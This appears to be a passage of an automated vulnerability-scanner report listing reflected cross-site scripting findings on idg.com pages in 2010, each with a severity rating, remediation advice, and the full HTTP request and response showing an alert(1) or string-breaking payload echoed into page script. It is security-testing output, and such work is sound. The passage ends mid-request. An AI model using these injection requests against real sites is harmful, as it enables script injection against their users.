2.173. http://idg.com/www/HomeNew.nsf/docs/videos [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/videos

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a66c"-alert(1)-"7641fac165d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/videos?6a66c"-alert(1)-"7641fac165d=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:46 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5028
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/videos?6a66c"-alert(1)-"7641fac165d=1");
} catch(err) {}</script>
...[SNIP]...

2.174. http://idg.com/www/homenew.nsf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d243d"%3b08b5f083b38 was submitted in the REST URL parameter 1. This input was echoed as d243d";08b5f083b38 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wwwd243d"%3b08b5f083b38/homenew.nsf HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:15 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5003
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /wwwd243d";08b5f083b38/homenew.nsf");
} catch(err) {}</script>
...[SNIP]...

2.175. http://idg.com/www/homenew.nsf [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/homenew.nsf

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c444a"-alert(1)-"ebcd302b3e9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf?c444a"-alert(1)-"ebcd302b3e9=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:15 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5016
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf?c444a"-alert(1)-"ebcd302b3e9=1");
} catch(err) {}</script>
...[SNIP]...

2.176. http://idg.com/www/homenew.nsf/06PageStyle.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/06PageStyle.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a290d"%3b812db769f64 was submitted in the REST URL parameter 1. This input was echoed as a290d";812db769f64 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wwwa290d"%3b812db769f64/homenew.nsf/06PageStyle.css HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:26 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5019
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /wwwa290d";812db769f64/homenew.nsf/06PageStyle.css");
} catch(err) {}</script>
...[SNIP]...

2.177. http://idg.com/www/homenew.nsf/06PageStyle.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/06PageStyle.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 380eb"%3bcca6040fbac was submitted in the REST URL parameter 3. This input was echoed as 380eb";cca6040fbac in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/06PageStyle.css380eb"%3bcca6040fbac HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:27 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5019
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/06PageStyle.css380eb";cca6040fbac");
} catch(err) {}</script>
...[SNIP]...

2.178. http://idg.com/www/homenew.nsf/06PageStyle.css [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/homenew.nsf/06PageStyle.css

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5875"-alert(1)-"4e33749b853 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/06PageStyle.css?e5875"-alert(1)-"4e33749b853=1 HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:26 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5032
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/06PageStyle.css?e5875"-alert(1)-"4e33749b853=1");
} catch(err) {}</script>
...[SNIP]...

2.179. http://idg.com/www/homenew.nsf/DataRequestor.js [OpenJavascriptLibrary parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/homenew.nsf/DataRequestor.js

Issue detail

The value of the OpenJavascriptLibrary request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f89bd"-alert(1)-"7fffc015d88 was submitted in the OpenJavascriptLibrary parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/DataRequestor.js?OpenJavascriptLibraryf89bd"-alert(1)-"7fffc015d88 HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:34 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5052
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/DataRequestor.js?OpenJavascriptLibraryf89bd"-alert(1)-"7fffc015d88");
} catch(err) {}</script>
...[SNIP]...

2.180. http://idg.com/www/homenew.nsf/DataRequestor.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/DataRequestor.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9ed7"%3b4d8994ca061 was submitted in the REST URL parameter 1. This input was echoed as e9ed7";4d8994ca061 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wwwe9ed7"%3b4d8994ca061/homenew.nsf/DataRequestor.js?OpenJavascriptLibrary HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:34 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5042
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /wwwe9ed7";4d8994ca061/homenew.nsf/DataRequestor.js?OpenJavascriptLibrary");
} catch(err) {}</script>
...[SNIP]...

2.181. http://idg.com/www/homenew.nsf/DataRequestor.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/DataRequestor.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51509"%3bdad758df106 was submitted in the REST URL parameter 3. This input was echoed as 51509";dad758df106 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/DataRequestor.js51509"%3bdad758df106?OpenJavascriptLibrary HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:35 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5042
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/DataRequestor.js51509";dad758df106?OpenJavascriptLibrary");
} catch(err) {}</script>
...[SNIP]...

2.182. http://idg.com/www/homenew.nsf/DataRequestor.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/homenew.nsf/DataRequestor.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40b14"-alert(1)-"47ec7171e3d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/DataRequestor.js?40b14"-alert(1)-"47ec7171e3d=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:35 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5033
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/DataRequestor.js?40b14"-alert(1)-"47ec7171e3d=1");
} catch(err) {}</script>
...[SNIP]...

2.183. http://idg.com/www/homenew.nsf/JSLib.js [OpenJavascriptLibrary parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/homenew.nsf/JSLib.js

Issue detail

The value of the OpenJavascriptLibrary request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39582"-alert(1)-"aaf4e6f2b15 was submitted in the OpenJavascriptLibrary parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/JSLib.js?OpenJavascriptLibrary39582"-alert(1)-"aaf4e6f2b15 HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:29 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5044
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/JSLib.js?OpenJavascriptLibrary39582"-alert(1)-"aaf4e6f2b15");
} catch(err) {}</script>
...[SNIP]...

2.184. http://idg.com/www/homenew.nsf/JSLib.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/JSLib.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d0cb"%3be2536f463e8 was submitted in the REST URL parameter 1. This input was echoed as 6d0cb";e2536f463e8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www6d0cb"%3be2536f463e8/homenew.nsf/JSLib.js?OpenJavascriptLibrary HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:30 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5034
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www6d0cb";e2536f463e8/homenew.nsf/JSLib.js?OpenJavascriptLibrary");
} catch(err) {}</script>
...[SNIP]...

2.185. http://idg.com/www/homenew.nsf/JSLib.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/JSLib.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f944"%3bff3d0453a55 was submitted in the REST URL parameter 3. This input was echoed as 3f944";ff3d0453a55 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/JSLib.js3f944"%3bff3d0453a55?OpenJavascriptLibrary HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:31 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5034
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/JSLib.js3f944";ff3d0453a55?OpenJavascriptLibrary");
} catch(err) {}</script>
...[SNIP]...

2.186. http://idg.com/www/homenew.nsf/JSLib.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/homenew.nsf/JSLib.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a46a"-alert(1)-"27e933b060b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/JSLib.js?6a46a"-alert(1)-"27e933b060b=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:34 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5025
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/JSLib.js?6a46a"-alert(1)-"27e933b060b=1");
} catch(err) {}</script>
...[SNIP]...

2.187. http://idg.com/www/homenew.nsf/ajaxroutine.js [OpenJavascriptLibrary parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/homenew.nsf/ajaxroutine.js

Issue detail

The value of the OpenJavascriptLibrary request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d323a"-alert(1)-"85f83ae81d0 was submitted in the OpenJavascriptLibrary parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/ajaxroutine.js?OpenJavascriptLibraryd323a"-alert(1)-"85f83ae81d0 HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
